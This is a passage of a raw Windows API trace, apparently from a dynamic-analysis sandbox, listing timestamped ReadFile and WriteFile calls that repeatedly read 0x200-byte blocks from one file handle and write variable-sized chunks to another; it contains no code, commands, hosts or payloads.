ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.903] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.904] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.904] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x325, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.905] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.905] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x39f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.906] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.906] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.907] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.907] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.908] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.909] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.909] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.910] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x10c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.910] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.911] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x73, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.912] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.912] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.913] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0xc8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.913] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.914] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.914] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.915] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x277, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.915] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x281, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.916] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.916] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2b7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.917] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.917] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.918] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.918] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.919] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x97, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.919] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x289, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.920] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.920] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.921] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.921] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.922] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.922] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x307, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.923] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.923] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.924] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.924] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x291, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.925] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.925] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x140, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.926] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.926] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.927] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.927] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x294, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.928] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.928] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3af, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.929] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.929] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a6, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.930] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.930] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2c1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.931] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.931] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x37b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.932] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.932] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.933] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.933] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.934] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.934] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.935] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x376, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.935] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.936] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.936] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.937] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.937] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.938] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x351, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.938] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.939] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ec, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.939] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.940] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x363, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.940] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.941] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3ac, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.941] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.942] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.942] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.943] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.943] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.944] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.944] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.945] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.945] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.946] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x355, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.946] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.947] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.947] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.948] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x332, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.948] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.949] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x34c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.949] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.950] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.950] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, 